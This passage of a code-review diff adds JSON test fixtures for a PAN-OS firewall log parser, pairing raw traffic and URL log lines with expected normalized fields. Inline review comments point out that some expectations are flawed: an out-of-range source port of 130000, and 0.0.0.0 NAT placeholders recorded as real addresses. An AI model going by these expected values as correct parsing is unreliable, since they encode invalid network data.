PanOSSanctionedStateOfApp=false PanOSSessionOwnerMidx=false PanOSSessionTracker=16 PanOSSourceDeviceClass= PanOSSourceDeviceOS= sntdom=xxxxx suser=xxxxx xxxxx suid= PanOSTunneledApplication=tunneled-app PanOSUsers=xxxxx\\\\xxxxx xxxxx PanOSVirtualSystemID=1 PanOSApplicationCategory=peer2peer PanOSConfigVersion=10.0 start=Feb 27 2021 20:16:17 src=1.1.1.1 dst=1.1.1.1 
sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=deny-attackers cs1Label=Rule suser0=xxxxx\\\\xxxxx xxxxx duser0=paloaltonetwork\\\\xxxxx app=fileguri cs3=vsys1 cs3Label=VirtualLocation cs4=untrust cs4Label=FromZone cs5=ethernet4Zone-test1 cs5Label=ToZone deviceInboundInterface=unknown deviceOutboundInterface=unknown cs6=rs-logging cs6Label=LogSetting cn1=25596 cn1Label=SessionID cnt=1 spt=22871 dpt=27092 sourceTranslatedPort=24429 destinationTranslatedPort=14744 proto=tcp act=deny PanOSBytes=1370294 out=400448 in=969846 cn2=314 cn2Label=PacketsTotal PanOSSessionStartTime=Feb 27 2021 20:15:48 cn3=56 cn3Label=SessionDuration cs2=custom-category cs2Label=URLCategory externalId=xxxxxxxxxxxxx PanOSSourceLocation=east-coast PanOSDestinationLocation=BR PanOSPacketsSent=194 PanOSPacketsReceived=120 reason=unknown PanOSDGHierarchyLevel1=11 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=xxxxx cat=unknown PanOSSourceUUID= PanOSDestinationUUID= PanOSIMSI=0 PanOSIMEI= PanOSParentSessionID=0 PanOSParentStarttime=Feb 27 2021 20:15:40 PanOSTunnel=GRE PanOSEndpointAssociationID=-3746994889972252628 PanOSChunksTotal=1945 PanOSChunksSent=323 PanOSChunksReceived=1622 PanOSRuleUUID=017e4d76-2003-47f4-8afc-1d35c808c615 PanOSHTTP2Connection=469139 PanOSLinkChangeCount=0 PanOSSDWANPolicyName= PanOSLinkSwitches= PanOSSDWANCluster= PanOSSDWANDeviceType= PanOSSDWANClusterType= PanOSSDWANSite= PanOSDynamicUserGroupName=dynug-4 PanOSX-Forwarded-ForIP=1.1.1.1 PanOSSourceDeviceCategory=N-Phone PanOSSourceDeviceProfile=n-profile PanOSSourceDeviceModel=Nexus PanOSSourceDeviceVendor=Google PanOSSourceDeviceOSFamily=LG-H790 PanOSSourceDeviceOSVersion=Android v6 PanOSSourceDeviceHost=pan-301 PanOSSourceDeviceMac=839147449905 PanOSDestinationDeviceCategory=N-Phone PanOSDestinationDeviceProfile=n-profile PanOSDestinationDeviceModel=Nexus PanOSDestinationDeviceVendor=Google PanOSDestinationDeviceOSFamily=H1511 
PanOSDestinationDeviceOSVersion=Android v7 PanOSDestinationDeviceHost=pan-355 PanOSDestinationDeviceMac=530589561221 PanOSContainerID=1873cc5c-0d31 PanOSContainerNameSpace=pns_default PanOSContainerName=pan-dp-77754f4 PanOSSourceEDL= PanOSDestinationEDL= PanOSGPHostID=xxxxxxxxxxxxxx PanOSEndpointSerialNumber=xxxxxxxxxxxxxx PanOSSourceDynamicAddressGroup= aqua_dag PanOSDestinationDynamicAddressGroup= PanOSHASessionOwner=session_owner-4 PanOSTimeGeneratedHighResolution=Feb 27 2021 20:16:18 PanOSNSSAINetworkSliceType=0 PanOSNSSAINetworkSliceDifferentiator=1bca5" + }, + "expected": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|TRAFFIC|end|3|ProfileToken=xxxxx dtz=UTC rt=Feb 27 2021 20:16:21 deviceExternalId=xxxxxxxxxxxxx PanOSApplicationContainer= PanOSApplicationRisk=5 PanOSApplicationSubcategory=file-sharing PanOSApplicationTechnology=peer-to-peer PanOSCaptivePortal=false PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSDestinationDeviceClass= PanOSDestinationDeviceOS= dntdom=paloaltonetwork duser=xxxxx duid= PanOSInboundInterfaceDetailsPort=0 PanOSInboundInterfaceDetailsSlot=0 PanOSInboundInterfaceDetailsType=unknown PanOSInboundInterfaceDetailsUnit=0 PanOSIsClienttoServer=false PanOSIsContainer=false PanOSIsDecryptMirror=false PanOSIsDecrypted=false PanOSIsDecryptedLog=false PanOSIsDecryptedPayloadForward=false PanOSIsDuplicateLog=false PanOSIsEncrypted=false PanOSIsIPV6=false PanOSIsInspectionBeforeSession=true PanOSIsMptcpOn=false PanOSIsNonStandardDestinationPort=false PanOSIsPacketCapture=false PanOSIsPhishing=false PanOSIsPrismaNetwork=false PanOSIsPrismaUsers=false PanOSIsProxy=false PanOSIsReconExcluded=false PanOSIsSaaSApplication=false PanOSIsServertoClient=false PanOSIsSourceXForwarded=false PanOSIsSystemReturn=false PanOSIsTransaction=false PanOSIsTunnelInspected=false PanOSIsURLDenied=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSNAT=false PanOSNonStandardDestinationPort=0 
PanOSOutboundInterfaceDetailsPort=0 PanOSOutboundInterfaceDetailsSlot=0 PanOSOutboundInterfaceDetailsType=unknown PanOSOutboundInterfaceDetailsUnit=0 PanOSSDWANFECRatio=0.0 PanOSSanctionedStateOfApp=false PanOSSessionOwnerMidx=false PanOSSessionTracker=16 PanOSSourceDeviceClass= PanOSSourceDeviceOS= sntdom=xxxxx suser=xxxxx xxxxx suid= PanOSTunneledApplication=tunneled-app PanOSUsers=xxxxx\\\\xxxxx xxxxx PanOSVirtualSystemID=1 PanOSApplicationCategory=peer2peer PanOSConfigVersion=10.0 start=Feb 27 2021 20:16:17 src=1.1.1.1 dst=1.1.1.1 sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=deny-attackers cs1Label=Rule suser0=xxxxx\\\\xxxxx xxxxx duser0=paloaltonetwork\\\\xxxxx app=fileguri cs3=vsys1 cs3Label=VirtualLocation cs4=untrust cs4Label=FromZone cs5=ethernet4Zone-test1 cs5Label=ToZone deviceInboundInterface=unknown deviceOutboundInterface=unknown cs6=rs-logging cs6Label=LogSetting cn1=25596 cn1Label=SessionID cnt=1 spt=22871 dpt=27092 sourceTranslatedPort=24429 destinationTranslatedPort=14744 proto=tcp act=deny PanOSBytes=1370294 out=400448 in=969846 cn2=314 cn2Label=PacketsTotal PanOSSessionStartTime=Feb 27 2021 20:15:48 cn3=56 cn3Label=SessionDuration cs2=custom-category cs2Label=URLCategory externalId=xxxxxxxxxxxxx PanOSSourceLocation=east-coast PanOSDestinationLocation=BR PanOSPacketsSent=194 PanOSPacketsReceived=120 reason=unknown PanOSDGHierarchyLevel1=11 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=xxxxx cat=unknown PanOSSourceUUID= PanOSDestinationUUID= PanOSIMSI=0 PanOSIMEI= PanOSParentSessionID=0 PanOSParentStarttime=Feb 27 2021 20:15:40 PanOSTunnel=GRE PanOSEndpointAssociationID=-3746994889972252628 PanOSChunksTotal=1945 PanOSChunksSent=323 PanOSChunksReceived=1622 PanOSRuleUUID=017e4d76-2003-47f4-8afc-1d35c808c615 PanOSHTTP2Connection=469139 PanOSLinkChangeCount=0 PanOSSDWANPolicyName= PanOSLinkSwitches= PanOSSDWANCluster= PanOSSDWANDeviceType= PanOSSDWANClusterType= 
PanOSSDWANSite= PanOSDynamicUserGroupName=dynug-4 PanOSX-Forwarded-ForIP=1.1.1.1 PanOSSourceDeviceCategory=N-Phone PanOSSourceDeviceProfile=n-profile PanOSSourceDeviceModel=Nexus PanOSSourceDeviceVendor=Google PanOSSourceDeviceOSFamily=LG-H790 PanOSSourceDeviceOSVersion=Android v6 PanOSSourceDeviceHost=pan-301 PanOSSourceDeviceMac=839147449905 PanOSDestinationDeviceCategory=N-Phone PanOSDestinationDeviceProfile=n-profile PanOSDestinationDeviceModel=Nexus PanOSDestinationDeviceVendor=Google PanOSDestinationDeviceOSFamily=H1511 PanOSDestinationDeviceOSVersion=Android v7 PanOSDestinationDeviceHost=pan-355 PanOSDestinationDeviceMac=530589561221 PanOSContainerID=1873cc5c-0d31 PanOSContainerNameSpace=pns_default PanOSContainerName=pan-dp-77754f4 PanOSSourceEDL= PanOSDestinationEDL= PanOSGPHostID=xxxxxxxxxxxxxx PanOSEndpointSerialNumber=xxxxxxxxxxxxxx PanOSSourceDynamicAddressGroup= aqua_dag PanOSDestinationDynamicAddressGroup= PanOSHASessionOwner=session_owner-4 PanOSTimeGeneratedHighResolution=Feb 27 2021 20:16:18 PanOSNSSAINetworkSliceType=0 PanOSNSSAINetworkSliceDifferentiator=1bca5", + "event": { + "action": "deny", + "category": [ + "network" + ], + "dataset": "traffic", + "duration": 56, + "severity": 3, + "start": "2021-02-27T20:16:17Z", + "timezone": "UTC", + "type": [ + "denied" + ] + }, + "@timestamp": "2021-02-27T20:16:21Z", + "action": { + "type": "end" + }, + "destination": { + "address": "1.1.1.1", + "bytes": 400448, + "geo": { + "country_iso_code": "BR" + }, + "ip": "1.1.1.1", + "nat": { + "ip": "1.1.1.1", + "port": 14744 + }, + "packets": 120, + "port": 27092, + "user": { + "name": "xxxxx" + } + }, + "host": { + "hostname": "xxxxx", + "id": "xxxxxxxxxxxxx", + "mac": "839147449905", + "name": "xxxxx", + "os": { + "family": "LG-H790", + "version": "Android v6" + }, + "type": "N-Phone" + }, + "log": { + "hostname": "xxxxx", + "logger": "traffic" + }, + "network": { + "application": "fileguri", + "bytes": 1370294, + "packets": 314, + "transport": "tcp" + }, + 
"observer": { + "egress": { + "interface": { + "alias": "ethernet4Zone-test1" + } + }, + "ingress": { + "interface": { + "alias": "untrust", + "name": "n" + } + }, + "product": "PAN-OS", + "type": "LF", + "vendor": "Palo Alto Networks", + "version": "2.0" + }, + "paloalto": { + "PanOSContainerName": "pan-dp-77754f4", + "PanOSContainerNameSpace": "pns_default", + "PanOSDestinationDeviceCategory": "N-Phone", + "PanOSDestinationDeviceHost": "pan-355", + "PanOSDestinationDeviceMac": "530589561221", + "PanOSDestinationDeviceModel": "Nexus", + "PanOSDestinationDeviceOSFamily": "H1511", + "PanOSDestinationDeviceOSVersion": "Android v7", + "PanOSDestinationDeviceProfile": "n-profile", + "PanOSDestinationDeviceVendor": "Google", + "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx", + "PanOSGPHostID": "xxxxxxxxxxxxxx", + "PanOSHASessionOwner": "session_owner-4", + "PanOSSessionStartTime": "Feb 27 2021 20:15:48", + "PanOSSourceDeviceHost": "pan-301", + "PanOSSourceDeviceModel": "Nexus", + "PanOSSourceDeviceProfile": "n-profile", + "PanOSSourceDeviceVendor": "Google", + "PanOSSourceDynamicAddressGroup": "aqua_dag", + "PanOSSourceLocation": "east-coast", + "PanOSX-Forwarded-ForIP": "1.1.1.1", + "URLCategory": "custom-category", + "VirtualLocation": "vsys1", + "endpoint": { + "serial_number": "xxxxxxxxxxxxxx" + } + }, + "related": { + "hosts": [ + "xxxxx" + ], + "ip": [ + "1.1.1.1" + ], + "user": [ + "xxxxx", + "xxxxx xxxxx" + ] + }, + "rule": { + "name": "deny-attackers", + "uuid": "017e4d76-2003-47f4-8afc-1d35c808c615" + }, + "source": { + "address": "1.1.1.1", + "bytes": 969846, + "ip": "1.1.1.1", + "nat": { + "ip": "1.1.1.1", + "port": 24429 + }, + "packets": 194, + "port": 22871, + "user": { + "name": "xxxxx xxxxx" + } + }, + "user": { + "name": "xxxxx xxxxx" + } + } +} \ No newline at end of file 
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/traffic_with_resotimestamp.json b/Palo Alto Networks/paloalto-prima-access/tests/traffic_with_resotimestamp.json
new file mode 100644
index 000000000..3445ddc4f
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/traffic_with_resotimestamp.json
@@ -0,0 +1,78 @@ +{ + "input": { + "message": "1,2024/01/03 13:15:29,026701002040,TRAFFIC,end,2816,2024/01/03 13:15:29,1.2.3.4,5.6.7.8,0.0.0.0,0.0.0.0,MyRule,,,ssl,vsys1,Z_DMZ_PROXY,Z_INTERCO_WAN,ethernet1/22.301,ethernet1/3.104,Log Profile,2024/01/03 13:15:29,219781,1,60975,443,0,0,0x41c,tcp,allow,5773,758,5015,14,2024/01/03 13:15:14,0,not-resolved,,7312415129244589397,0x0,10.0.0.0-10.255.255.255,United States,,7,7,tcp-fin,0,0,0,0,,PA2314-CD,from-policy,,,0,,0,,N/A,0,0,0,0,0bbe5a53-f498-4cc2-a170-ced134f4824c,0,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2024-01-03T13:15:30.547+01:00,,,encrypted-tunnel,networking,browser-based,4,\\\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\\\",,ssl,no,no,0,NonProxyTraffic," + }, + "expected": { + "message": "1,2024/01/03 13:15:29,026701002040,TRAFFIC,end,2816,2024/01/03 13:15:29,1.2.3.4,5.6.7.8,0.0.0.0,0.0.0.0,MyRule,,,ssl,vsys1,Z_DMZ_PROXY,Z_INTERCO_WAN,ethernet1/22.301,ethernet1/3.104,Log Profile,2024/01/03 13:15:29,219781,1,60975,443,0,0,0x41c,tcp,allow,5773,758,5015,14,2024/01/03 13:15:14,0,not-resolved,,7312415129244589397,0x0,10.0.0.0-10.255.255.255,United States,,7,7,tcp-fin,0,0,0,0,,PA2314-CD,from-policy,,,0,,0,,N/A,0,0,0,0,0bbe5a53-f498-4cc2-a170-ced134f4824c,0,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2024-01-03T13:15:30.547+01:00,,,encrypted-tunnel,networking,browser-based,4,\\\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\\\",,ssl,no,no,0,NonProxyTraffic,", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "traffic", + "duration": 0, + "outcome": "success", + "type": [ + "end" + ] + }, + "@timestamp": "2024-01-03T12:15:30.547000Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "end" + }, + "destination": { + "address": "5.6.7.8", + "bytes": 5015, + "ip": "5.6.7.8", + "nat": { + "ip": "0.0.0.0", + "port": 0 + }, + "packets": 7, + "port": 443 + }, + "log": { + 
"hostname": "PA2314-CD", + "logger": "traffic" + }, + "network": { + "application": "ssl", + "bytes": 5773, + "packets": 14, + "transport": "tcp" + }, + "observer": { + "name": "PA2314-CD", + "product": "PAN-OS", + "serial_number": "026701002040" + }, + "paloalto": { + "Threat_ContentType": "end", + "VirtualLocation": "vsys1" + }, + "related": { + "ip": [ + "0.0.0.0", + "1.2.3.4", + "5.6.7.8" + ] + }, + "rule": { + "name": "MyRule", + "uuid": "0bbe5a53-f498-4cc2-a170-ced134f4824c" + }, + "source": { + "address": "1.2.3.4", + "bytes": 758, + "ip": "1.2.3.4", + "nat": { + "ip": "0.0.0.0", + "port": 0 + }, + "packets": 7, + "port": 60975 + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/udp_deny_csv.json b/Palo Alto Networks/paloalto-prima-access/tests/udp_deny_csv.json new file mode 100644 index 000000000..3238eb5e4 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/udp_deny_csv.json 
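Review bot: The expected output pins the log's NAT placeholders as real addresses: `destination.nat` and `source.nat` are both `{"ip": "0.0.0.0", "port": 0}`, and `"0.0.0.0"` is listed in `related.ip` alongside `1.2.3.4` and `5.6.7.8`. In PAN-OS traffic logs an all-zero NAT address and port appear to mean that no translation took place, so this expectation makes `related.ip` — the field analysts pivot on for correlation — carry a non-routable value on every untranslated session. I would expect the fixture to omit both `nat` objects and the `"0.0.0.0"` entry, which presumably needs a guard in the parser rather than only a fixture change.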
@@ -0,0 +1,78 @@
+{
+ "input": {
+ "message": "<14>Sep 16 10:00:00 PA 1,9/16/19 10:00,1801017000,TRAFFIC,deny,2049,9/16/19 10:00,10.0.0.2,1.2.3.4,5.4.4.3,5.4.3.2,DENYALL,,,protection,vsys1,DNS,AAAAA,ae2.503,ethernet1/1,Secure,9/16/19 10:00,11111,1,130000,53,6379,53,0x400000,udp,reset-both,284,284,0,1,9/16/19 10:00,0,any,0,50660381851,0x0,10.0.0.0-10.255.255.255,Spain,0,1,0,policy-deny,0,0,0,0,,PA-1,from-application,,,0,,0,,N/A,0,0,0,0"
+ },
+ "expected": {
+ "message": "<14>Sep 16 10:00:00 PA 1,9/16/19 10:00,1801017000,TRAFFIC,deny,2049,9/16/19 10:00,10.0.0.2,1.2.3.4,5.4.4.3,5.4.3.2,DENYALL,,,protection,vsys1,DNS,AAAAA,ae2.503,ethernet1/1,Secure,9/16/19 10:00,11111,1,130000,53,6379,53,0x400000,udp,reset-both,284,284,0,1,9/16/19 10:00,0,any,0,50660381851,0x0,10.0.0.0-10.255.255.255,Spain,0,1,0,policy-deny,0,0,0,0,,PA-1,from-application,,,0,,0,,N/A,0,0,0,0",
+ "event": {
+ "action": "reset-both",
+ "category": [
+ "network"
+ ],
+ "dataset": "traffic",
+ "duration": 0,
+ "outcome": "success",
+ "type": [
+ "denied"
+ ]
+ },
+ "@timestamp": "2019-09-16T10:00:00Z",
+ "action": {
+ "name": "reset-both",
+ "outcome": "success",
+ "type": "deny"
+ },
+ "destination": {
+ "address": "1.2.3.4",
+ "bytes": 0,
+ "ip": "1.2.3.4",
+ "nat": {
+ "ip": "5.4.3.2",
+ "port": 53
+ },
+ "packets": 0,
+ "port": 53
+ },
+ "log": {
+ "hostname": "PA-1",
+ "logger": "traffic"
+ },
+ "network": {
+ "application": "protection",
+ "bytes": 284,
+ "packets": 1,
+ "transport": "udp"
+ },
+ "observer": {
+ "name": "PA-1",
+ "product": "PAN-OS",
+ "serial_number": "1801017000"
+ },
+ "paloalto": {
+ "Threat_ContentType": "deny",
+ "VirtualLocation": "vsys1"
+ },
+ "related": {
+ "ip": [
+ "1.2.3.4",
+ "10.0.0.2",
+ "5.4.3.2",
+ "5.4.4.3"
+ ]
+ },
+ "rule": {
+ "name": "DENYALL"
+ },
+ "source": {
+ "address": "10.0.0.2",
+ "bytes": 284,
+ "ip": "10.0.0.2",
+ "nat": {
+ "ip": "5.4.4.3",
+ "port": 6379
+ },
+ "packets": 1,
+ "port": 130000
+ }
+ }
+}
\ No newline at end of file
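Review bot: The expected `source.port` is `130000`, which is outside the 16-bit range (0–65535) a UDP port can take; the value is copied straight from the `130000` field of the input message, so the fixture is either built on an invalid sample or is deliberately pinning that out-of-range ports pass through the parser unvalidated. If the former, a valid constructed value such as `13000` in both the message and the expectation keeps the test meaningful; if the latter, the filename or a dedicated fixture should make that intent explicit, since downstream consumers that type the field as a port may reject or truncate the event.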
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/url_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/url_cef.json new file mode 100644 index 000000000..41d495725 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/url_cef.json 
@@ -0,0 +1,135 @@ +{ + "input": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|THREAT|url|1|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 20:48:21 deviceExternalId=xxxxxxxxxxxxx PanOSApplicationCategory=database PanOSApplicationContainer= PanOSApplicationRisk=2 PanOSApplicationSubcategory=database PanOSApplicationTechnology=client-server PanOSCaptivePortal=false PanOSCloudHostname=xxxxx PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSDestinationDeviceClass= PanOSDestinationDeviceOS= dntdom=xxxxx duser=xxxxx o\"'\"test duid= PanOSHTTPRefererFQDN= PanOSHTTPRefererPort= PanOSHTTPRefererProtocol= PanOSHTTPRefererURLPath= PanOSInboundInterfaceDetailsPort=0 PanOSInboundInterfaceDetailsSlot=0 PanOSInboundInterfaceDetailsType=unknown PanOSInboundInterfaceDetailsUnit=0 PanOSIsClienttoServer=true PanOSIsContainer=false PanOSIsDecryptMirror=false PanOSIsDecrypted=false PanOSIsDuplicateLog=false PanOSIsEncrypted=false PanOSIsIPV6=false PanOSIsMptcpOn=false PanOSIsNonStandardDestinationPort=false PanOSIsPacketCapture=false PanOSIsPhishing=false PanOSIsPrismaNetwork=false PanOSIsPrismaUsers=false PanOSIsProxy=false PanOSIsReconExcluded=false PanOSIsSaaSApplication=false PanOSIsServertoClient=false PanOSIsSourceXForwarded=true PanOSIsSystemReturn=true PanOSIsTransaction=false PanOSIsTunnelInspected=false PanOSIsURLDenied=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSNAT=false PanOSNonStandardDestinationPort=32350 PanOSOutboundInterfaceDetailsPort=2 PanOSOutboundInterfaceDetailsSlot=1 PanOSOutboundInterfaceDetailsType=ethernet PanOSOutboundInterfaceDetailsUnit=0 PanOSPacket= PanOSSanctionedStateofApp=false PanOSSeverity=Informational PanOSSourceDeviceClass= PanOSSourceDeviceOS= sntdom=xxxxx suser=xxxxx xxxxx suid= PanOSTunneledApplication=untunneled PanOSURLDomain=?% PanOSUsers=xxxxx\\\\xxxxx xxxxx PanOSVirtualSystemID=1 PanOSConfigVersion=10.0 start=Mar 01 2021 20:48:16 src=1.1.1.1 dst=1.1.1.1 
sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=allow-business-apps cs1Label=Rule suser0=xxxxx\\\\xxxxx xxxxx duser0=xxxxx\\\\xxxxx o\"'\"test app=maxdb cs3=vsys1 cs3Label=VirtualLocation cs4=ethernet4Zone-test4 cs4Label=FromZone cs5=untrust cs5Label=ToZone deviceInboundInterface=unknown deviceOutboundInterface=ethernet1/2 cs6=rs-logging cs6Label=LogSetting cn1=980296 cn1Label=SessionID cnt=1 spt=32350 dpt=1532 sourceTranslatedPort=26236 destinationTranslatedPort=12016 proto=tcp act=block-url request=?% cs2=sports cs2Label=URLCategory flexString2=server to client flexString2Label=DirectionOfAttack externalId=xxxxxxxxxxxxx PanOSSourceLocation=west-coast PanOSDestinationLocation=PK requestContext=application/jpeg fileId=0 PanOSURLCounter=1 requestClientApplication= PanOSX-Forwarded-For= PanOSReferer= PanOSDGHierarchyLevel1=11 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=xxxxx PanOSSourceUUID= PanOSDestinationUUID= requestMethod=post PanOSIMSI=1 PanOSIMEI=Navy Base PanOSParentSessionID=8802 PanOSParentStarttime=Mar 01 2021 20:48:10 PanOSTunnel=VXLAN PanOSInlineMLVerdict=overflow PanOSContentVersion=50222 PanOSSigFlags=2 PanOSHTTPHeaders= PanOSURLCategoryList=sports,\u200b11008,\u200b38340 PanOSRuleUUID=ec14df0b-c845-4435-87a2-d207730f5ae8 PanOSHTTP2Connection=8802 PanOSDynamicUserGroupName= PanOSX-Forwarded-ForIP= PanOSSourceDeviceCategory=L-Phone PanOSSourceDeviceProfile=l-profile PanOSSourceDeviceModel=Note 4G PanOSSourceDeviceVendor=Lenovo PanOSSourceDeviceOSFamily=K6 PanOSSourceDeviceOSVersion=Android v9 PanOSSourceDeviceHost=pan-505 PanOSSourceDeviceMac=596703749274 PanOSDestinationDeviceCategory=L-Phone PanOSDestinationDeviceProfile=l-profile PanOSDestinationDeviceModel=Note XT PanOSDestinationDeviceVendor=Lenovo PanOSDestinationDeviceOSFamily=K8 PanOSDestinationDeviceOSVersion=Android v8 PanOSDestinationDeviceHost=pan-506 PanOSDestinationDeviceMac=150083646537 
PanOSContainerID=1873cc5c-0d31 PanOSContainerNameSpace=pns_default PanOSContainerName=pan-dp-77754f4 PanOSSourceEDL= PanOSDestinationEDL= PanOSHostID=xxxxxxxxxxxxxx PanOSEndpointSerialNumber=xxxxxxxxxxxxxx PanOSSourceDynamicAddressGroup= blue_dag PanOSDestinationDynamicAddressGroup= PanOSTimeGeneratedHighResolution=Mar 01 2021 20:48:16 PanOSNSSAINetworkSliceType=b5" + }, + "expected": { + "message": "CEF:0|Palo Alto Networks|LF|2.0|THREAT|url|1|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 20:48:21 deviceExternalId=xxxxxxxxxxxxx PanOSApplicationCategory=database PanOSApplicationContainer= PanOSApplicationRisk=2 PanOSApplicationSubcategory=database PanOSApplicationTechnology=client-server PanOSCaptivePortal=false PanOSCloudHostname=xxxxx PanOSCortexDataLakeTenantID=xxxxxxxxxxxxx PanOSDestinationDeviceClass= PanOSDestinationDeviceOS= dntdom=xxxxx duser=xxxxx o\"'\"test duid= PanOSHTTPRefererFQDN= PanOSHTTPRefererPort= PanOSHTTPRefererProtocol= PanOSHTTPRefererURLPath= PanOSInboundInterfaceDetailsPort=0 PanOSInboundInterfaceDetailsSlot=0 PanOSInboundInterfaceDetailsType=unknown PanOSInboundInterfaceDetailsUnit=0 PanOSIsClienttoServer=true PanOSIsContainer=false PanOSIsDecryptMirror=false PanOSIsDecrypted=false PanOSIsDuplicateLog=false PanOSIsEncrypted=false PanOSIsIPV6=false PanOSIsMptcpOn=false PanOSIsNonStandardDestinationPort=false PanOSIsPacketCapture=false PanOSIsPhishing=false PanOSIsPrismaNetwork=false PanOSIsPrismaUsers=false PanOSIsProxy=false PanOSIsReconExcluded=false PanOSIsSaaSApplication=false PanOSIsServertoClient=false PanOSIsSourceXForwarded=true PanOSIsSystemReturn=true PanOSIsTransaction=false PanOSIsTunnelInspected=false PanOSIsURLDenied=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSNAT=false PanOSNonStandardDestinationPort=32350 PanOSOutboundInterfaceDetailsPort=2 PanOSOutboundInterfaceDetailsSlot=1 PanOSOutboundInterfaceDetailsType=ethernet PanOSOutboundInterfaceDetailsUnit=0 
PanOSPacket= PanOSSanctionedStateofApp=false PanOSSeverity=Informational PanOSSourceDeviceClass= PanOSSourceDeviceOS= sntdom=xxxxx suser=xxxxx xxxxx suid= PanOSTunneledApplication=untunneled PanOSURLDomain=?% PanOSUsers=xxxxx\\\\xxxxx xxxxx PanOSVirtualSystemID=1 PanOSConfigVersion=10.0 start=Mar 01 2021 20:48:16 src=1.1.1.1 dst=1.1.1.1 sourceTranslatedAddress=1.1.1.1 destinationTranslatedAddress=1.1.1.1 cs1=allow-business-apps cs1Label=Rule suser0=xxxxx\\\\xxxxx xxxxx duser0=xxxxx\\\\xxxxx o\"'\"test app=maxdb cs3=vsys1 cs3Label=VirtualLocation cs4=ethernet4Zone-test4 cs4Label=FromZone cs5=untrust cs5Label=ToZone deviceInboundInterface=unknown deviceOutboundInterface=ethernet1/2 cs6=rs-logging cs6Label=LogSetting cn1=980296 cn1Label=SessionID cnt=1 spt=32350 dpt=1532 sourceTranslatedPort=26236 destinationTranslatedPort=12016 proto=tcp act=block-url request=?% cs2=sports cs2Label=URLCategory flexString2=server to client flexString2Label=DirectionOfAttack externalId=xxxxxxxxxxxxx PanOSSourceLocation=west-coast PanOSDestinationLocation=PK requestContext=application/jpeg fileId=0 PanOSURLCounter=1 requestClientApplication= PanOSX-Forwarded-For= PanOSReferer= PanOSDGHierarchyLevel1=11 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=xxxxx PanOSSourceUUID= PanOSDestinationUUID= requestMethod=post PanOSIMSI=1 PanOSIMEI=Navy Base PanOSParentSessionID=8802 PanOSParentStarttime=Mar 01 2021 20:48:10 PanOSTunnel=VXLAN PanOSInlineMLVerdict=overflow PanOSContentVersion=50222 PanOSSigFlags=2 PanOSHTTPHeaders= PanOSURLCategoryList=sports,\u200b11008,\u200b38340 PanOSRuleUUID=ec14df0b-c845-4435-87a2-d207730f5ae8 PanOSHTTP2Connection=8802 PanOSDynamicUserGroupName= PanOSX-Forwarded-ForIP= PanOSSourceDeviceCategory=L-Phone PanOSSourceDeviceProfile=l-profile PanOSSourceDeviceModel=Note 4G PanOSSourceDeviceVendor=Lenovo PanOSSourceDeviceOSFamily=K6 PanOSSourceDeviceOSVersion=Android v9 PanOSSourceDeviceHost=pan-505 
PanOSSourceDeviceMac=596703749274 PanOSDestinationDeviceCategory=L-Phone PanOSDestinationDeviceProfile=l-profile PanOSDestinationDeviceModel=Note XT PanOSDestinationDeviceVendor=Lenovo PanOSDestinationDeviceOSFamily=K8 PanOSDestinationDeviceOSVersion=Android v8 PanOSDestinationDeviceHost=pan-506 PanOSDestinationDeviceMac=150083646537 PanOSContainerID=1873cc5c-0d31 PanOSContainerNameSpace=pns_default PanOSContainerName=pan-dp-77754f4 PanOSSourceEDL= PanOSDestinationEDL= PanOSHostID=xxxxxxxxxxxxxx PanOSEndpointSerialNumber=xxxxxxxxxxxxxx PanOSSourceDynamicAddressGroup= blue_dag PanOSDestinationDynamicAddressGroup= PanOSTimeGeneratedHighResolution=Mar 01 2021 20:48:16 PanOSNSSAINetworkSliceType=b5", + "event": { + "action": "block-url", + "category": [ + "network" + ], + "dataset": "threat", + "severity": 1, + "start": "2021-03-01T20:48:16Z", + "timezone": "UTC", + "type": [ + "info" + ] + }, + "@timestamp": "2021-03-01T20:48:21Z", + "action": { + "type": "url" + }, + "destination": { + "address": "1.1.1.1", + "geo": { + "country_iso_code": "PK" + }, + "ip": "1.1.1.1", + "nat": { + "ip": "1.1.1.1", + "port": 12016 + }, + "port": 1532, + "user": { + "name": "xxxxx o\"'\"test" + } + }, + "host": { + "hostname": "xxxxx", + "id": "xxxxxxxxxxxxx", + "mac": "596703749274", + "name": "xxxxx", + "os": { + "family": "K6", + "version": "Android v9" + }, + "type": "L-Phone" + }, + "log": { 